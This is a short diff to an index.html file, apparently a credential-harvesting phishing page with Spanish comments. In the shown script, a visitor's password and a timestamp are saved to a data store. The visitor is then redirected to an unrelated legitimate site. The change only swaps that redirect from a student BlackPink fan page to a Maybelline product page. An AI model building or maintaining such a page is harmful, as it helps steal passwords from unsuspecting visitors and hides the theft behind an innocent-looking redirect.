--- a/index.html
+++ b/index.html
@@ -89,8 +89,8 @@
         password: password,
         fecha: new Date().toLocaleString()
       }).then(() => {
-        // Redirigir al enlace BlackPink después de guardar
-        window.location.href = "https://www.bu.edu/lernet/artemis/years/2017/projects/StudentWebsites/Michelle/pages/BlackPink.html";
+        // Redirigir al nuevo enlace de Maybelline después de guardar
+        window.location.href = "https://www.maybelline.com.mx/todos-los-productos/maquillaje-para-ojos/cejas/super-lock-clear-gel?variant=Super+Lock+Clear+Gel&gclsrc=aw.ds&gad_source=1&gad_campaignid=21783241585&gbraid=0AAAAAC3qpt3MM8HMncTiu47WoY8ZykYDL&gclid=Cj0KCQjw5onGBhDeARIsAFK6QJY-qMjVhjjVzKtjlVmx33Qv9SV2bIlI0XbUDO6QugscVvJz67mxsy4aAr8VEALw_wcB";
       }).catch((error) => {
         alert("Error al guardar: " + error.message);
       });
@@ -107,4 +107,5 @@
   </script>
 </body>
 </html>
+
 
